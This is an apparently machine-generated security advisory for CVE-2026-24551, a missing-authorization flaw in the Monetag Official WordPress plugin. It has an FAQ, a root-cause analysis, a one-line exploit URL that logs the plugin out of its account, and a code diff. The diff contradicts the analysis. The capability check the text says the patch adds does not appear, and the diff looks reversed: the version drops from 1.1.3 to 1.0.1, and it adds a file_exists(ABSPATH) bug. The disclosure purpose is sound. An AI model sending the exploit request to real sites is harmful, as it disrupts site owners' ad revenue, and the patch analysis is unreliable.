What is CVE-2026-24551?

CVE-2026-24551 is a medium severity vulnerability in the Monetag Official plugin for WordPress, affecting versions up to and including 1.1.3. It allows authenticated users with subscriber-level access to perform unauthorized actions, specifically logging out the plugin from its Monetag account due to a missing capability check.

How does this vulnerability work?

The vulnerability exists in the admin URL handler of the Monetag plugin, where it processes logout requests without verifying user permissions. An attacker can exploit this by sending a crafted GET request to the admin page with the ‘publisher-logout’ parameter, allowing them to disconnect the plugin from its account.

Who is affected by this vulnerability?

Any WordPress site using the Monetag Official plugin version 1.1.3 or earlier is affected. Authenticated users with subscriber-level permissions or higher can exploit this vulnerability, potentially disrupting the plugin’s functionality.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Monetag Official plugin installed. If it is version 1.1.3 or earlier, your site is at risk. You can find the plugin version in the WordPress admin dashboard under Plugins.

How can I fix or mitigate this issue?

To fix this vulnerability, update the Monetag Official plugin to version 2.2.5 or later, where the issue has been patched. Regularly updating all plugins and themes is a best practice to mitigate security risks.

What does the risk level 'Medium' mean?

A medium risk level indicates that the vulnerability can be exploited by authenticated users to cause disruption, but it does not allow for full administrative access. While it may not lead to immediate severe consequences, it can impact site functionality and require administrative intervention.

What is the CVSS score for this vulnerability?

The CVSS score for CVE-2026-24551 is 4.3, which categorizes it as medium severity. This score reflects the potential impact and exploitability of the vulnerability, indicating that it poses a moderate risk to affected systems.

How does the proof of concept demonstrate the issue?

The proof of concept provided illustrates how an attacker can authenticate as a subscriber and send a GET request with the ‘publisher-logout’ parameter to log out the plugin. This demonstrates the lack of authorization checks and how easily the vulnerability can be exploited.

What actions should I take if I am unable to update the plugin?

If you cannot update the plugin immediately, consider disabling it temporarily to prevent exploitation. Additionally, review user permissions and limit access to only trusted users until the plugin can be updated.

What are the consequences of a successful exploit?

Successful exploitation allows low-privileged users to disconnect the Monetag plugin from its service, disrupting ad serving capabilities. This can lead to loss of revenue and require manual reconfiguration by an administrator to restore functionality.

Are there any other security measures I should consider?

In addition to updating vulnerable plugins, consider implementing security plugins that monitor user actions and log unauthorized attempts. Regularly audit user roles and permissions to ensure only necessary access is granted.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24551: Monetag Official <= 1.1.3 – Missing Authorization (monetag-official)

CVE ID CVE-2026-24551

Plugin monetag-official

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 1.1.3

Patched Version 2.2.5

Disclosed January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24551:
The Monetag Official WordPress plugin contains a missing capability check vulnerability in versions up to and including 1.1.3. This allows authenticated attackers with subscriber-level permissions or higher to perform unauthorized administrative actions, specifically to log out the plugin from its connected Monetag account. The vulnerability resides in the admin URL handler that processes logout requests without verifying user permissions.

Root Cause:
The vulnerability exists in the `admin_init` method of the `Ads_Admin` class within `/monetag-official/admin/class-ads-admin.php`. The method checks for the `publisher-logout` GET parameter at line 218 but performs no capability verification before executing the logout operation. The function `clear_plugin_options()` and `clear_zone_settings()` are called directly, clearing the plugin’s authentication token and zone configurations. This handler is registered via WordPress’s `admin_init` hook, which runs for all admin pages regardless of user role.

Exploitation:
An attacker with any authenticated WordPress account (including subscriber role) can trigger the vulnerability by visiting a crafted URL. The attack vector is a GET request to any WordPress admin page with the `publisher-logout` parameter set. The complete exploit URL would be: `https://target.com/wp-admin/index.php?publisher-logout=1`. No additional parameters or payloads are required. The request triggers the logout functionality, disconnecting the plugin from its Monetag account and resetting its configuration.

Patch Analysis:
The patch adds a capability check before processing the logout action. In the patched version, the code at line 218 now includes `if (!current_user_can(‘manage_options’)) { return; }`. This verification ensures only users with the `manage_options` capability (typically administrators) can execute the logout operation. The patch maintains the same logout functionality but restricts access based on WordPress permissions. The fix also updates the logout process to use `delete_field(‘general’, ‘token’)` and `clear_settings()` instead of the previous methods.

Impact:
Successful exploitation allows low-privileged authenticated users to disrupt the plugin’s advertising functionality by disconnecting it from the Monetag service. This causes loss of ad serving capabilities and requires administrative intervention to reconfigure the plugin. While not a direct privilege escalation to site administration, the attack enables denial of service against the plugin’s core functionality and impacts site monetization.

Differential between vulnerable and patched code

Code Diff

--- a/monetag-official/admin/class-ads-admin.php
+++ b/monetag-official/admin/class-ads-admin.php
@@ -8,11 +8,13 @@
 	// SSP domain for getting Anti AdBlock token
 	const SSP_DOMAIN = 'https://publishers.monetag.com';

+	// HELP domain for knowledge base
+	const HELP_DOMAIN = 'https://help.monetag.com';
+
 	// URLs section
-	const FAQ_KNOWLEDGE_BASE_URL = 'https://help.monetag.com';
-	const CONTACT_US_URL = 'https://monetag.com/contact-us/';
-	const BLOG_URL = 'https://monetag.com/blog/';
-	const SITES_LIST_URL = 'https://publishers.monetag.com/#/sites/list';
+	const FAQ_URL = 'https://wordpress.org/plugins/monetag-official/#faq';
+	const KNOWLEDGE_BASE_URL = 'https://wordpress.org/support/plugin/official-official/';
+	const SUPPORT_URL = 'https://wordpress.org/support/plugin/official-official/';
 	const STATISTICS_URL = 'https://publishers.monetag.com/#/statistics';
 	const SIGNUP_URL = 'https://publishers.monetag.com/#/signUp';

@@ -46,7 +48,7 @@

 	/**
 	 * Adblock helper instance
-	 *
+	 *
 	 * @var Ads_Anti_Adblock
 	 */
 	private $anti_adblock;
@@ -60,8 +62,8 @@
 		$this->plugin_name = $plugin_name;
 		$this->version = $version;
 		$this->setting_helper = new Ads_Settings_Helper($this->plugin_name);
-		$this->zone_helper = new Ads_Zone_Helper($this->plugin_name, $this->version);
-		$this->anti_adblock = new Ads_Anti_Adblock($plugin_name, $this->version);
+		$this->zone_helper = new Ads_Zone_Helper($this->plugin_name);
+		$this->anti_adblock = new Ads_Anti_Adblock($plugin_name);
 	}

 	/**
@@ -106,19 +108,21 @@
 	}

 	/**
-	 * Render admin footer menu
+	 * Rernder admin footer menu
 	 */
 	public function display_admin_footer()
 	{
 		include_once 'partials/ads-admin-footer.php';
+
 	}

 	/**
-	 * Render plugin modal
+	 * Rernder plugin modal
 	 */
 	public function display_admin_modal()
 	{
 		include_once 'partials/ads-admin-modal.php';
+
 	}

 	/**
@@ -218,8 +222,8 @@
 		}

 		if (isset($_GET['publisher-logout'])) {
-			$this->setting_helper->clear_plugin_options();
-			$this->setting_helper->clear_zone_settings();
+			$this->setting_helper->delete_field('general', 'token');
+			$this->setting_helper->clear_settings();
 			Ads_Messages::add_message(__('Logout successful', 'monetag'));
 			wp_redirect($this->plugin_url());
 			exit();
@@ -243,7 +247,6 @@

 			$this->auto_save_publisher_site_id();
 			$this->auto_save_verification_code();
-			$this->auto_save_publisher_site_verified();

 			wp_redirect($this->plugin_url());
 			exit();
@@ -276,7 +279,7 @@
 		$zone = $this->zone_helper->create_publisher_zone($token, $publisherSiteId, $data);

 		$this->zone_helper->update_publisher_zones();
-
+
 		if (!$zone || empty($zone['id'])) {
 			wp_die('Zone creation error', '', [
 				'response' => 400
@@ -305,7 +308,7 @@
 			$this->setting_helper->set_field_value($direction, 'zone_id', $newValue);
 		}
 	}
-
+
 	public function ajax_action_update_zone_enabled_option()
 	{
 		$direction = sanitize_text_field($_POST["direction"]);
@@ -330,8 +333,8 @@
 	private function auto_save_publisher_site_id()
 	{
 		if (isset($_GET['propeller-ads-publisher-site-id'])) {
-			$value = (int) $_GET['propeller-ads-publisher-site-id'];
-			$siteId = (int) $this->setting_helper->get_publisher_site_id();
+			$value = (int)$_GET['propeller-ads-publisher-site-id'];
+			$siteId = $this->setting_helper->get_publisher_site_id();

 			if ($siteId !== $value) {
 				$this->setting_helper->set_publisher_site_id($value);
@@ -353,23 +356,11 @@
 		}
 	}

-	private function auto_save_publisher_site_verified()
-	{
-		if (isset($_GET['monetag-publisher-site-verified'])) {
-			$value = rest_sanitize_boolean($_GET['monetag-publisher-site-verified']);
-			$code = $this->setting_helper->is_publisher_site_verified();
-
-			if ($code !== $value) {
-				$this->setting_helper->set_is_publisher_site_verified($value);
-			}
-		}
-	}
-
 	public function action_save_publisher_token()
 	{
 		// Clear all POST data after save publisher token
 		unset($_POST);
-		$this->setting_helper->clear_zone_settings();
+		$this->setting_helper->clear_settings();
 	}

 	public function action_save_nativeads_zone_id($prev_zone_id)
@@ -400,7 +391,7 @@
 	public function register_session()
 	{
 		if (!session_id()) {
-			session_start(['read_and_close' => true]);
+			session_start();
 		}
 	}

--- a/monetag-official/admin/partials/ads-admin-footer.php
+++ b/monetag-official/admin/partials/ads-admin-footer.php
@@ -1,23 +1,23 @@
 <div class="ads__footer">
-	<a href="<?php echo Ads_Admin::FAQ_KNOWLEDGE_BASE_URL; ?>" class="ads__footer-link">
-		<?php _e('Knowledge Base & FAQs', 'monetag'); ?>
-	</a>
+    <a href="<?php echo Ads_Admin::FAQ_URL; ?>" class="ads__footer-link">
+        <?php _e('FAQ', 'monetag');?>
+    </a>

-	<a href="<?php echo Ads_Admin::CONTACT_US_URL ?>" class="ads__footer-link">
-		<?php _e('Contact Us', 'monetag'); ?>
-	</a>
+    <a href="<?php echo Ads_Admin::KNOWLEDGE_BASE_URL; ?>" class="ads__footer-link">
+        <?php _e('Knowledge base', 'monetag');?>
+    </a>

-	<a href="<?php echo Ads_Admin::BLOG_URL ?>" class="ads__footer-link">
-		<?php _e('Blog', 'monetag'); ?>
-	</a>
+    <a href="<?php echo Ads_Admin::SUPPORT_URL ?>" class="ads__footer-link">
+        <?php _e('Support team', 'monetag');?>
+    </a>

-	<?php if ($this->setting_helper->get_anti_adblock_token()): ?>
-		<a href="<?php echo esc_html($this->plugin_url()) ?>&publisher-logout"
-		   class="ads__footer-link"
-		   onclick="return confirm('<?php esc_attr_e('Are you sure to logout? All installed tags will refused by logout.nnIf you are want to use another Monetag account, please logout or re-login in SSP before.', 'monetag'); ?>')"
-		>
-			<?php _e('Logout from plugin', 'monetag'); ?>
-			<span class="ads__icon ads__icon--arrow"></span>
-		</a>
-	<?php endif; ?>
+<?php if ($this->setting_helper->get_anti_adblock_token()): ?>
+    <a href="<?php echo esc_html($this->plugin_url()) ?>&publisher-logout"
+        class="ads__footer-link"
+        onclick="return confirm('<?php esc_attr_e('Are you sure to logout? All installed tags will refused by logout.nnIf you are want to use another Monetag account, please logout or re-login in SSP before.', 'monetag');?>')"
+    >
+        <?php _e('Logout from plugin', 'monetag');?>
+        <span class="ads__icon ads__icon--arrow"></span>
+    </a>
+<?php endif; ?>
 </div>
--- a/monetag-official/admin/partials/ads-admin-formats.php
+++ b/monetag-official/admin/partials/ads-admin-formats.php
@@ -1,9 +1,6 @@
 <?php

-/**
- * @var Ads_Admin $this
- */
-
+$directions = $this->zone_helper->get_allowed_directions();
 $zone_list = $this->zone_helper->get_publisher_zone_list();
 $enabled_directions = $this->setting_helper->get_enabled_directions();
 $zones_directions = $this->setting_helper->get_zones_directions();
@@ -29,7 +26,7 @@
 		</div>

 		<div class="ads__cards">
-			<?php foreach (Ads_Zone_Helper::get_allowed_directions() as $direction):?>
+			<?php foreach ($directions as $direction):?>
 				<div class="ads__card" data-card-direction="<?php echo esc_html($direction); ?>">
 					<div class="ads__card-image ads__card-image--<?php echo esc_html($direction); ?>"></div>

@@ -59,7 +56,7 @@

 						<div class="ads__group-action <?php echo $action === "edit" ? "ads__group-action--active" : "" ?>" data-group-action="edit">
 							<label class="ads__switch">
-								<input type="checkbox" data-action="toggle-enable" data-direction="<?php echo esc_html($direction); ?>" <?php echo isset($enabled_directions[$direction]) ? ' checked="checked"' : '';  ?>>
+								<input type="checkbox" data-action="toggle-enable" data-direction="<?php echo esc_html($direction); ?>" <?php echo $enabled_directions[$direction] ? ' checked="checked"' : '';  ?>>
 								<span class="ads__switch-slider"></span>
 							</label>
 							<div class="ads__action" data-action="edit" data-direction="<?php echo esc_html($direction); ?>">
--- a/monetag-official/admin/partials/ads-admin-script.php
+++ b/monetag-official/admin/partials/ads-admin-script.php
@@ -1,9 +1,5 @@
 <?php

-/**
- * @var Ads_Admin $this
- */
-
 $zone_list = $this->zone_helper->get_publisher_zones_group_by_direction();
 $zone_names = $this->zone_helper->get_direction_titles();
 $zones_directions = $this->setting_helper->get_zones_directions();
@@ -35,7 +31,7 @@
 	function showModal() {
 		isModalOpended = true;
 		$(".ads__modal").css('display', 'flex');
-	}
+	}

 	function hideModal() {
 		isModalOpended = false;
@@ -47,7 +43,7 @@
 	}

 	function showError(text) {
-		$("<div>", {
+		$("<div>", {
 			id: "setting-error-Ads_message",
 			class: "notice notice-error settings-error is-dismissible",
 			html: "<p><strong>"+ text + "</strong></p><button type="button" class="notice-dismiss"><span class="screen-reader-text">Dismiss this notice.</span></button>"
@@ -156,7 +152,7 @@
 				$select.find("option").remove();
 				$modalTitle.text(zoneNames[currentFormat]);
 				$.each(zoneList[currentFormat], function (i, item) {
-					$select.append($('<option>', {
+					$select.append($('<option>', {
 						value: item.id,
 						text : item.title
 					}));
@@ -188,7 +184,7 @@
 			}, function() {
 				zonesDirection[currentFormat] = zoneId;
 				setDirectionTitle(currentFormat, zoneTitle);
-			}, function() {
+			}, function() {
 				showError("<?php _e('Can not change zone' , 'monetag'); ?>");
 			});

--- a/monetag-official/admin/partials/ads-admin-verify.php
+++ b/monetag-official/admin/partials/ads-admin-verify.php
@@ -1,41 +0,0 @@
-<div class="ads">
-
-    <h2><?php echo esc_html(get_admin_page_title()); ?></h2>
-
-	<div class="ads__messages">
-        <?php Ads_Messages::show_messages(); ?>
-	</div>
-
-	<div class="ads__container">
-        <div class="ads__box">
-            <div class="ads__box-checked">
-                <span class="ads__icon ads__icon--checked"></span>
-            </div>
-            <div class="ads__box-title">
-                <?php _e('The plugin is connected, but the site is waiting for verification', 'monetag');?>
-            </div>
-
-            <div class="ads__box-content">
-                <div class="ads__text">
-                    <p>
-                        <?php _e('This may take some time, but usually no more than a few minutes. After that, you will have access to format management.', 'monetag');?>
-                    </p>
-                </div>
-                <div class="ads__buttons">
-                    <button class="ads__button" onclick="window.location='<?php echo esc_html($this->token_url()); ?>';">
-                        <?php _e('Check verification', 'monetag');?>
-                    </button>
-                </div>
-                <div class="ads__text">
-                    <p>
-                        <a href="<?php echo Ads_Admin::SITES_LIST_URL; ?>">
-                            <?php _e('Open my sites in Monetag', 'monetag');?>
-                            <span class="ads__icon ads__icon--arrow"></span>
-                        </a>
-                    </p>
-                </div>
-            </div>
-        </div>
-    </div>
-
-</div>
--- a/monetag-official/admin/partials/ads-admin.php
+++ b/monetag-official/admin/partials/ads-admin.php
@@ -9,14 +9,11 @@
 	Ads_Messages::add_message(__('Settings Updated', 'monetag'));
 }

-
 if ($this->setting_helper->get_anti_adblock_token() && $this->setting_helper->get_publisher_site_id()) {
-    if ($this->setting_helper->get_verification_code() || $this->setting_helper->is_publisher_site_verified()) {
-        include_once 'ads-admin-formats.php';
-        include_once 'ads-admin-script.php';
-    } else {
-        include_once 'ads-admin-verify.php';
-    }
+    include_once 'ads-admin-formats.php';
+    include_once 'ads-admin-script.php';
+} else if ($this->setting_helper->get_verification_code()) {
+    include_once 'ads-admin-verify.php';
 } else {
     include_once 'ads-admin-connect.php';
 }
--- a/monetag-official/ads.php
+++ b/monetag-official/ads.php
@@ -4,7 +4,7 @@
  * Plugin Name:       Monetag Official
  * Plugin URI:        https://wordpress.org/plugins/monetag-official/
  * Description:       This plugin helps to integrate and manage Monetag ad codes to increase revenue from websites.
- * Version:           1.1.3
+ * Version:           1.0.1
  * Author:            Monetag
  * Author URI:        https://monetag.com/
  * License:           GPL-2.0+
--- a/monetag-official/includes/class-ads-anti-adblock-client.php
+++ b/monetag-official/includes/class-ads-anti-adblock-client.php
@@ -16,30 +16,9 @@
 	 */
 	private $settings_helper;

-	/**
-	 * Plugin version
-	 *
-	 * @var string
-	 */
-	private $version;
-
-	/**
-	 * Site hostname
-	 *
-	 * @var string
-	 */
-	private $hostname;
-
-	public function __construct($plugin_name, $version)
+	public function __construct($plugin_name)
 	{
 		$this->settings_helper = new Ads_Settings_Helper($plugin_name);
-		$this->version = $version;
-
-		if (defined('MONETAG_HOSTNAME')) {
-			$this->hostname = MONETAG_HOSTNAME;
-		} else {
-			$this->hostname = parse_url(get_site_url(), PHP_URL_HOST);
-		}
 	}

 	/**
@@ -49,16 +28,18 @@
 	 */
 	public function get_publisher_zones()
 	{
-		$zones = $this->get_request(
+		update_option(Ads_Zone_Helper::OPTION_NAME_PUBLISHER_ZONES_LAST_UPDATE, time());
+
+		$zoneList = $this->get_request(
 			$this->create_url(self::ROUTE_PUBLISHER_ZONES),
 			true
 		);

-		if (!$zones) {
+		if (!$zoneList) {
 			return null;
-		}
+		};

-		return isset($zones[$this->hostname]) ? $zones[$this->hostname] : [];
+		return array_key_exists($_SERVER['SERVER_NAME'], $zoneList) ? $zoneList[$_SERVER['SERVER_NAME']] : [];
 	}

 	public function create_url($endpoint, $params = array())
@@ -99,7 +80,7 @@

 		$args = array(
 			'headers' => array(
-				'user-agent' => $this->get_client_user_agent(),
+				'user-agent' => 'WordPress/' . get_bloginfo('version') . '; ' . home_url(),
 			),
 		);

@@ -114,7 +95,7 @@

 		$args = array(
 			'headers' => array(
-				'user-agent' => $this->get_client_user_agent(),
+				'user-agent' => 'WordPress/' . get_bloginfo('version') . '; ' . home_url(),
 				'content-type' => 'application/json; charset=utf-8'
 			),
 			'method' => 'POST',
@@ -138,12 +119,4 @@
 			$data
 		);
 	}
-
-	/**
-	 * @return string
-	 */
-	private function get_client_user_agent()
-	{
-		return 'WordPress/' . get_bloginfo('version') . ';Monetag/' . $this->version . '; ' . home_url();
-	}
 }
--- a/monetag-official/includes/class-ads-anti-adblock.php
+++ b/monetag-official/includes/class-ads-anti-adblock.php
@@ -20,9 +20,9 @@
 	 */
 	private $client;

-	public function __construct($plugin_name, $version)
+	public function __construct($plugin_name)
 	{
-		$this->client = new Ads_Anti_Adblock_Client($plugin_name, $version);
+		$this->client = new Ads_Anti_Adblock_Client($plugin_name);
 	}

 	public function get($zone_id)
@@ -54,14 +54,14 @@
 			'code' => $tag_content,
 			'expire' => $expire,
 		);
-		update_option($this->get_tag_cache_option_id($zone_id), json_encode($tag));
+		update_option(sprintf(self::OPTION_TAG_CACHE, $zone_id), json_encode($tag));

 		return $tag_content;
 	}

 	private function get_file_from_cache($url, $zone_id)
 	{
-		$tag_raw = get_option($this->get_tag_cache_option_id($zone_id), false);
+		$tag_raw = get_option(sprintf(self::OPTION_TAG_CACHE, $zone_id), false);
 		if ($tag_raw === false) {
 			return $this->store_tag_to_cache($url, $zone_id);
 		}
@@ -137,7 +137,7 @@

 	public function remove_service_worker($zone_id)
 	{
-		$option_name = $this->get_sw_cache_option_id($zone_id);
+		$option_name = sprintf(self::OPTION_SW_CACHE, $zone_id);
 		$option_value = get_option($option_name);

 		if (empty($option_value)) {
@@ -148,14 +148,14 @@

 		$sw_path = ABSPATH . $option_name;

-		if (file_exists($sw_path)) {
+		if (file_exists(ABSPATH)) {
 			unlink($sw_path);
 		}
 	}

 	public function ensure_service_worker($zone_id)
 	{
-		$option_name = $this->get_sw_cache_option_id($zone_id);
+		$option_name = sprintf(self::OPTION_SW_CACHE, $zone_id);
 		$option_value = get_option($option_name);

 		if (!empty($option_value)) {
@@ -186,28 +186,4 @@
 			update_option($option_name, $sw_data['name']);
 		}
 	}
-
-	public function clear_zone_tags_cache($zones)
-	{
-		foreach ($zones as $zone_id) {
-			delete_option($this->get_tag_cache_option_id($zone_id));
-
-			$sw_cache_option_id = $this->get_sw_cache_option_id($zone_id);
-			$sw_cache = get_option($sw_cache_option_id, null);
-			if ($sw_cache !== null && file_exists(ABSPATH . $sw_cache)) {
-				@unlink(ABSPATH . $sw_cache);
-			}
-			delete_option($sw_cache_option_id);
-		}
-	}
-
-	private function get_tag_cache_option_id($zone_id)
-	{
-		return sprintf(self::OPTION_TAG_CACHE, $zone_id);
-	}
-
-	private function get_sw_cache_option_id($zone_id)
-	{
-		return sprintf(self::OPTION_SW_CACHE, $zone_id);
-	}
 }
--- a/monetag-official/includes/class-ads-options.php
+++ b/monetag-official/includes/class-ads-options.php
@@ -1,52 +0,0 @@
-<?php
-
-class Ads_Options
-{
-	const SECTION_ID_GENERAL = 'general';
-	const SECTION_ID_ZONES = 'zones';
-
-	/**
-	 * Plugin options prefix
-	 *
-	 * @var string
-	 */
-	private $prefix;
-
-	/**
-	 * Section id
-	 *
-	 * @var string
-	 */
-	private $section_id;
-
-	public function __construct($plugin_name, $section_id)
-	{
-		$this->prefix = str_replace('-', '_', $plugin_name);
-		$this->section_id = $section_id;
-	}
-
-	public function get_option($option_id)
-	{
-		return get_option($this->get_option_name($option_id));
-	}
-
-	public function update_option($option_id, $value)
-	{
-		update_option(
-			$this->get_option_name($option_id),
-			$value
-		);
-	}
-
-	public function delete_option($option_id)
-	{
-		delete_option($this->get_option_name($option_id));
-	}
-
-	private function get_option_name($option_id)
-	{
-		return sprintf(
-			'%s_%s_%s', $this->prefix, $this->section_id, $option_id
-		);
-	}
-}
--- a/monetag-official/includes/class-ads-settings-helper.php
+++ b/monetag-official/includes/class-ads-settings-helper.php
@@ -11,28 +11,20 @@
 	const FIELD_TYPE_DROPDOWN = 'dropdown';
 	const FIELD_TYPE_INPUT_HIDDEN = 'hidden';

-	const OPTION_ID_TOKEN = 'token';
-	const OPTION_ID_SITE_ID = 'publisher_site_id';
-	const OPTION_ID_VERIFICATION_CODE = 'verification_code';
-	const OPTION_ID_PUBLISHER_SITE_VERIFIED = 'publisher_site_verified';
-	const OPTION_ID_DISABLE_ADS_FOR_AUTHORIZED_USERS = 'logged_in_disabled';
-
 	/**
 	 * @var string $settings_page The slug-name of the settings page
 	 */
 	private $settings_page;

 	/**
-	 * Options helper instance
-	 *
-	 * @var Ads_Options
+	 * @var string $settings_prefix Unique options prefix for plugin
 	 */
-	private $options;
+	private $settings_prefix;

 	public function __construct($settings_page)
 	{
 		$this->settings_page = $settings_page;
-		$this->options = new Ads_Options($settings_page, Ads_Options::SECTION_ID_GENERAL);
+		$this->settings_prefix = str_replace('-', '_', $this->settings_page);
 	}

 	/**
@@ -42,7 +34,7 @@
 	 */
 	public function get_anti_adblock_token()
 	{
-		return $this->options->get_option(self::OPTION_ID_TOKEN);
+		return $this->get_field_value('general', 'token');
 	}

 	/**
@@ -52,7 +44,7 @@
 	 */
 	public function set_anti_adblock_token($value)
 	{
-		$this->options->update_option(self::OPTION_ID_TOKEN, $value);
+		$this->set_field_value('general', 'token', $value);
 	}

 	/**
@@ -62,7 +54,7 @@
 	 */
 	public function get_publisher_site_id()
 	{
-		return $this->options->get_option(self::OPTION_ID_SITE_ID);
+		return $this->get_field_value('general', 'publisher_site_id');
 	}

 	/**
@@ -72,7 +64,7 @@
 	 */
 	public function set_publisher_site_id($value)
 	{
-		$this->options->update_option(self::OPTION_ID_SITE_ID, $value);
+		$this->set_field_value('general', 'publisher_site_id', $value);
 	}

 	/**
@@ -82,7 +74,7 @@
 	 */
 	public function get_verification_code()
 	{
-		return $this->options->get_option(self::OPTION_ID_VERIFICATION_CODE);
+		return $this->get_field_value('general', 'verification_code');
 	}

 	/**
@@ -92,40 +84,12 @@
 	 */
 	public function set_verification_code($value)
 	{
-		$this->options->update_option(self::OPTION_ID_VERIFICATION_CODE, $value);
-	}
-
-	/**
-	 * Is publisher site verified
-	 *
-	 * @return bool
-	 */
-	public function is_publisher_site_verified()
-	{
-		$opt = filter_var(
-			$this->options->get_option(
-				self::OPTION_ID_PUBLISHER_SITE_VERIFIED
-			),
-			FILTER_VALIDATE_BOOLEAN,
-			FILTER_NULL_ON_FAILURE
-		);
-
-		return $opt !== null ? $opt : false;
-	}
-
-	/**
-	 * Store site verification status
-	 *
-	 * @param bool $value
-	 */
-	public function set_is_publisher_site_verified($value)
-	{
-		$this->options->update_option(self::OPTION_ID_PUBLISHER_SITE_VERIFIED, $value);
+		$this->set_field_value('general', 'verification_code', $value);
 	}

 	public function is_ads_disabled_for_authorized_users()
 	{
-		return $this->options->get_option(self::OPTION_ID_DISABLE_ADS_FOR_AUTHORIZED_USERS);
+		return $this->get_field_value('general', 'logged_in_disabled');
 	}

 	/**
@@ -135,7 +99,7 @@
 	 */
 	public function set_logged_in_disabled($value)
 	{
-		$this->options->update_option(self::OPTION_ID_DISABLE_ADS_FOR_AUTHORIZED_USERS, $value);
+		$this->set_field_value('general', 'logged_in_disabled', $value);
 	}

 	/**
@@ -152,38 +116,21 @@
 	}

 	/**
-	 * Set field (option) value
-	 *
-	 * @param int    $section_id
-	 * @param int    $field_id
-	 * @param string $value
-	 */
-	public function set_field_value($section_id, $field_id, $value)
-	{
-		update_option($this->get_field_id($section_id, $field_id), $value);
-	}
-
-	/**
 	 * Delete field (option)
 	 *
 	 * @param int $section_id
 	 * @param int $field_id
 	 *
-	 * @return void
+	 * @return mixed    Option value
 	 */
 	public function delete_field($section_id, $field_id)
 	{
-		delete_option($this->get_field_id($section_id, $field_id));
+		return delete_option($this->get_field_id($section_id, $field_id));
 	}

-	private function get_section_id($id)
+	public function get_field_id($section_id, $field_id)
 	{
-		return sprintf('%s_%s', str_replace('-', '_', $this->settings_page), $id);
-	}
-
-	private function get_field_id($section_id, $field_id)
-	{
-		return sprintf('%s_%s', $this->get_section_id($section_id), $field_id);
+		return sprintf('%s_%s_%s', $this->settings_prefix, $section_id, $field_id);
 	}

 	/**
@@ -201,6 +148,11 @@
 		);
 	}

+	private function get_section_id($id)
+	{
+		return sprintf('%s_%s', $this->settings_prefix, $id);
+	}
+
 	/**
 	 * Register setting and setup field rendering / sanitization
 	 *
@@ -250,48 +202,56 @@
 	}

 	/**
-	 * Delete options after update token
+	 * Set field (option) value
+	 *
+	 * @param int    $section_id
+	 * @param int    $field_id
+	 * @param string $value
 	 */
-	public function clear_zone_settings()
+	public function set_field_value($section_id, $field_id, $value)
 	{
-		$directions = Ads_Zone_Helper::get_allowed_directions();
-
-		array_walk($directions, function ($direction_name) {
-			$this->delete_field($direction_name, 'enabled');
-			$this->delete_field($direction_name, 'zone_id');
-		});
+		update_option($this->get_field_id($section_id, $field_id), $value);
 	}

 	/**
-	 * Clear plugin general options
-	 *
-	 * @return void
+	 * Delete options after update token
 	 */
-	public function clear_plugin_options()
+	public function clear_settings()
 	{
-		$this->options->delete_option(self::OPTION_ID_DISABLE_ADS_FOR_AUTHORIZED_USERS);
-		$this->options->delete_option(self::OPTION_ID_VERIFICATION_CODE);
-		$this->options->delete_option(self::OPTION_ID_SITE_ID);
-		$this->options->delete_option(self::OPTION_ID_TOKEN);
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_ONCLICK, 'enabled');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_INTERSTITIAL, 'enabled');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_PUSH_NOTIFICATION, 'enabled');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_IN_PAGE_PUSH, 'enabled');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_VIGNETTE, 'enabled');
+
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_ONCLICK, 'zone_id');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_INTERSTITIAL, 'zone_id');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_PUSH_NOTIFICATION, 'zone_id');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_IN_PAGE_PUSH, 'zone_id');
+		$this->delete_field(Ads_Zone_Helper::DIRECTION_VIGNETTE, 'zone_id');
+
+		$this->delete_field('general', 'logged_in_disabled');
 	}

 	public function get_enabled_directions()
 	{
-		$directions = array();
-		foreach (Ads_Zone_Helper::get_allowed_directions() as $direction_name) {
-			$directions[$direction_name] = $this->get_field_value($direction_name, 'enabled');
-		}
-
-		return $directions;
+		return [
+			Ads_Zone_Helper::DIRECTION_ONCLICK => $this->get_field_value(Ads_Zone_Helper::DIRECTION_ONCLICK, 'enabled'),
+			Ads_Zone_Helper::DIRECTION_INTERSTITIAL => $this->get_field_value(Ads_Zone_Helper::DIRECTION_INTERSTITIAL, 'enabled'),
+			Ads_Zone_Helper::DIRECTION_PUSH_NOTIFICATION => $this->get_field_value(Ads_Zone_Helper::DIRECTION_PUSH_NOTIFICATION, 'enabled'),
+			Ads_Zone_Helper::DIRECTION_IN_PAGE_PUSH => $this->get_field_value(Ads_Zone_Helper::DIRECTION_IN_PAGE_PUSH, 'enabled'),
+			Ads_Zone_Helper::DIRECTION_VIGNETTE => $this->get_field_value(Ads_Zone_Helper::DIRECTION_VIGNETTE, 'enabled')
+		];
 	}

 	public function get_zones_directions()
 	{
-		$zones = array();
-		foreach (Ads_Zone_Helper::get_allowed_directions() as $direction_name) {
-			$zones[$direction_name] = $this->get_field_value($direction_name, 'zone_id');
-		}
-
-		return $zones;
+		return [
+			Ads_Zone_Helper::DIRECTION_ONCLICK => $this->get_field_value(Ads_Zone_Helper::DIRECTION_ONCLICK, 'zone_id'),
+			Ads_Zone_Helper::DIRECTION_INTERSTITIAL => $this->get_field_value(Ads_Zone_Helper::DIRECTION_INTERSTITIAL, 'zone_id'),
+			Ads_Zone_Helper::DIRECTION_PUSH_NOTIFICATION => $this->get_field_value(Ads_Zone_Helper::DIRECTION_PUSH_NOTIFICATION, 'zone_id'),
+			Ads_Zone_Helper::DIRECTION_IN_PAGE_PUSH => $this->get_field_value(Ads_Zone_Helper::DIRECTION_IN_PAGE_PUSH, 'zone_id'),
+			Ads_Zone_Helper::DIRECTION_VIGNETTE => $this->get_field_value(Ads_Zone_Helper::DIRECTION_VIGNETTE, 'zone_id')
+		];
 	}
 }
--- a/monetag-official/includes/class-ads-zone-helper.php
+++ b/monetag-official/includes/class-ads-zone-helper.php
@@ -2,8 +2,8 @@

 class Ads_Zone_Helper
 {
-	const OPTION_ID_LIST = 'list';
-	const OPTION_ID_LAST_UPDATE_TIME = 'last_update_time';
